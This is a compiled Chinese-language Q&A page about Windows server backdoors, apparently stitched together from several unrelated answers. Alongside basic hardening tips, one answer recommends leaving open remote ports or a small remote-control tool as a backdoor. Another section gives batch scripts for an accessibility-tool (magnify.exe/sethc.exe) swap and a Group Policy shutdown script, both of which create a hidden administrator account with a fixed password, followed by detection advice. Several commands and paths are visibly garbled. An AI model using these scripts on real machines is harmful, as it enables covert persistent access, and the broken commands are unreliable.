伺服器後門

A. 如何防服務器後門

一、修改windows默認的遠程埠
也許有高手認為自己做的挺安全的，就算是默認埠也不用被入侵以及被破密。其實修改默認的遠程埠一方面是防止入侵，另外一方面也是防止被掃描影響系統的穩定。
有了解過掃描3389軟體的人都知道，一般的攻擊者都是掃描3389埠的，所以改成其它的埠可以防止被掃描到您的主機。為什麼說另外一方面也是防止被掃描3389埠影響到系統的穩定呢？如果您的伺服器默認是使用3389埠，掃描軟體就會強力嘗試密碼字典里的密碼，與您的主機建議很多的連接，佔用系統里的資源導致伺服器出現卡的現象。所以修改默認的遠程埠是有幾個好處的，希望大家重視。

二、修改windows默認的用戶名
我們做安全也是針對攻擊的行為而製作相對的策略，攻擊的人嘗試密碼破解的時候，都是使用默認的用戶名administrator，當你修改了用戶名之後，它猜不出您的用戶名，即使密碼嘗試上千萬次都不會成功的，如果要使用用戶名字典再加下密碼字典，我估計攻擊者就沒有那個心思了，而且也不會一時間破密到您的用戶名。所以修改用戶名就會減低被入侵的可能。
那麼修改成什麼樣的用戶名才是比較安全呢？個人建議使用中文再加上數字再上字母這樣的用戶名就非常強大了。例如： 非誠勿擾ADsp0973

三、使用復雜的密碼
從掃描以及破解的軟體看，都是使用簡單的常用的密碼進行破解的，例如1q2w3e4r5t或者123456或者12345qwert等簡單的組合密碼，所以使用這些密碼是非常不安全的。我個人就建議避免使用簡單的密碼防止被破解。
建議使用的密碼里包含 大字字母+小字字母+數字+特殊字元。 長度至少要12以上這樣會好一些。

四、注意以上三點是必然的安全策略，建議還要不定時修改一下用戶名與密碼，遠程埠，掃描病毒這些操作。
維護系統的安全以及業務的穩定運行，這些步驟必不可少，請各位伺服器管理員重視，安全不怕做多，就怕做少。這些都是常用的操作維護系統的安全，當然也有其它方面的安全性需要鞏固的，做到上面的幾點都已經夠了，如果系統里的哪些埠以及服務是比較危險的，這個也需要從那個方面去加固一下。

總結：以上是我平常使用的最基本方法，也是最簡單的了，希望可以帶給大家幫助，謝謝。如何修改遠程埠、用戶名與密碼？這些也是很簡單操作就可以的了。如果實在不懂，可以聯系下我，謝謝。

B. 伺服器被放置了後門文件，如何判後門文件是從伺服器哪個埠進來的

一般都是通過網站程序後門然後提權拿到伺服器許可權進行後門操作。檢查下網站或資料庫有無可疑的文件可以查看下最近修改的文件日期來排查一下估計是被上傳了webshell

C. 怎麼給電腦(伺服器)留後門

好多後門呀、、真的很多、、一時間都想不起來。。
最簡單的開個3389或4899

我記得有一個TMD遠控。
反正我這上面顯示的是TMD
是不是我不知道、、
這個遠控的特點是..
服務端1K、、
留作後門的好幫手啊！

D. 伺服器里有後門程序怎麼辦

最簡單的辦法是打補丁 就是先把能堵的漏洞給堵了
然後找到後門的程序，如果不是必須運行程序的話，最好刪除
要是必須運行程序的話，建議用軟體屏蔽，或者隔離

E. 如何在伺服器留下長期隱蔽性後門

但絕對不能容忍的是，伺服器被植入後門，攻擊者如入無人之境，而管理者去渾然不覺。本文將對當前比較流行的後門技術進行解析，知己知彼方能杜絕後門。
1、放大鏡後門 放大鏡(magnify.exe)是Windows 2000/XP/2003系統集成的一個小工具，它是為方便視力障礙用戶而設計的。在用戶登錄系統前可以通過「Win+U」組合鍵調用該工具，因此攻擊者就用精心構造的magnify.exe同名文件替換放大鏡程序，從而達到控制伺服器的目的。 通常情況下，攻擊者通過構造的magnify.exe程序創建一個管理員用戶，然後登錄系統。當然有的時候他們也會通過其直接調用命令提示符(cmd.exe)或者系統shell(explorer.exe)。需要說明的是，這樣調用的程序都是system許可權，即系統最高許可權。不過，以防萬一當管理員在運行放大鏡程序時發現破綻，攻擊者一般通過該構造程序完成所需的操作後，最後會運行真正的放大鏡程序，以蒙騙管理員。其利用的方法是： (1).構造批處理腳本 @echo off
net user gslw$ test168 /add
net localgroup administrators gslw$ /add
%Windir%system32 agnify.exe
exit 將上面的腳本保存為magnify.bat，其作用是創建一個密碼為test168的管理員用戶gslw$，最後運行改名後的放大鏡程序nagnify.exe。(圖1)
(2).文件格式轉換 因為批處理文件magnify.bat的後綴是bat，必須要將其轉換為同名的exe文件才可以通過組合鍵Win+U調用。攻擊者一般可以利用WinRar構造一個自動解壓的exe壓縮文件，當然也可以利用bat2com、com2exe進行文件格式的轉換。我們就以後面的方法為例進行演示。 打開命令行，進入bat2com、com2exe工具所在的目錄，然後運行命令「bat2com magnify.bat」將magnify.bat轉換成magnify.com，繼續運行命令「com2exe magnify.com」將magnify.com轉換成magnify.exe，這樣就把批處理文件轉換成和放大鏡程序同名的程序文件。(圖2)(3).放大鏡文件替換 下面就需要用構造的magnify.exe替換同名的放大鏡程序文件，由於Windows對系統文件的自我保護，因此不能直接替換，不過Windows提供了一個命令replace.exe，通過它我們可以替換系統文件。另外，由於系統文件在%Windir%system32dllcache中有備份，為了防止文件替換後又重新還原，所有我們首先要替換該目錄下的magnify.exe文件。假設構造的magnify.exe文件在%Windir%目錄下，我們可以通過一個批處理即可實現文件的替換。 @echo off
%Windir%system32dllcachemagnify.exe nagnify.exe
%Windir%system32magnify.exe nagnify.exe
replace.exe %Windir%magnify.exe %Windir%system32dllcache
replace.exe %Windir%magnify.exe %Windir%system32
exit 上面批處理的功能是，首先將放大鏡程序備份為nagnify.exe，然後用同名的構造程序將其替換。(圖3)
(4).攻擊利用 當完成上述操作後，一個放大鏡後門就做成了。然後攻擊者通過遠程桌面連接伺服器，在登錄界面窗口摁下本地鍵盤的「Win+U」組合鍵，選擇運行其中的「放大鏡」，此刻就在伺服器上創建了一個管理員用戶gslw$並打開了放大鏡工具，然後攻擊者就開業通過該帳戶登錄伺服器。當然，攻擊者在斷開登錄前會刪除所有與該帳戶相關的信息，以防被管理員發現。(圖4) (5).防範措施 進入%Windir%system32查看magnify.exe的文件圖標是否是原來的放大鏡的圖標，如果不是的話極有可能被植入了放大鏡後門。當然，有的時候攻擊者也會將其文件圖標更改為和原放大鏡程序的圖標一樣。此時我們可以查看magnify.exe文件的大小和修改時間，如果這兩樣有一項不符就比較懷疑了。我們也可以先運行magnify.exe，然後運行lusrmgr.msc查看是否有可疑的用戶。如果確定伺服器被放置了放大鏡後門，首先要刪除該文件，然後恢復正常的放大鏡程序。當然，我們也可以做得更徹底一些，用一個無關緊要的程序替換放大鏡程序。甚至我們也可以以其人之道還治其人之身，構造一個magnify.exe，通過其警告攻擊者或者進行入侵監控和取證。 補充：與放大鏡後門類似的還有「粘滯鍵」後門，即按下SHIEF鍵五次可以啟動粘滯鍵功能，其利用和防範措施與放大鏡後門類似，只是將magnify.exe換成了sethc.exe。 2、組策略後門 相對來說，組策略後門更加隱蔽。往冊表中添加相應鍵值實現隨系統啟動而運行是木馬常用的伎倆，也為大家所熟知。其實，在最策略中也可以實現該功能，不僅如此它還可以實現在系統關機時進行某些操作。這就是通過最策略的「腳本(啟動/關機)」項來說實現。具體位置在「計算機配置→Windows設置」項下。因為其極具隱蔽性，因此常常被攻擊者利用來做伺服器後門。 攻擊者獲得了伺服器的控制權就可以通過這個後門實施對對主機的長期控制。它可以通過這個後門運行某些程序或者腳本，最簡單的比如創建一個管理員用戶，他可以這樣做： (1).創建腳本 創建一個批處理文件add.bat，add.bat的內容是：@echo off & net user gslw$ test168 /add && netlocalgroup administrators gslw$ /add & exit (創建一個用戶名為gslw$密碼為test168的管理員用戶)。 (2).後門利用 在「運行」對話框中輸入gpedit.msc，定位到「計算機配置一>Windows設置一>腳本(啟動/關機)」, 雙擊右邊窗口的「關機」，在其中添加add.bat。就是說當系統關機時創建gslw$用戶。對於一般的用戶是根本不知道在系統中有一個隱藏用戶，就是他看見並且刪除了該帳戶，當系統關機時又會創建該帳戶。所以說，如果用戶不知道組策略中的這個地方那他一定會感到莫名其妙。 其實，對於組策略中的這個「後門」還有很多利用法，攻擊者通過它來運行腳本或者程序，嗅探管理員密碼等等。當他們獲取了管理員的密碼後，就不用在系統中創建帳戶了，直接利用管理員帳戶遠程登錄系統。因此它也是「雙刃劍」，希望大家重視這個地方。當你為伺服器被攻擊而莫名其妙時，說不定攻擊者就是通過它實現的。(圖5)(3).後門防範 組策略後門是攻擊者利用了管理員的疏忽心理，因為對於組策略中的「(啟動/關機)腳本」項往往被大家忽略，有些管理員甚至不知道組策略中的這個選項。防範這類伺服器後門，也非常簡單，只需打開組策略工具，定位到「腳本(啟動/關機)」項下進行查看。當然也可以進入 和目錄檢查是否有可疑的腳本。

F. 網路中後門是什麼意思

就是讓攻擊者可以在以後的日子裡可以隨時進行連接的東西，不一定是程序，可能會在你的系統裡面留一個後門賬戶，可以隨時進行遠程桌面連接的後門賬戶。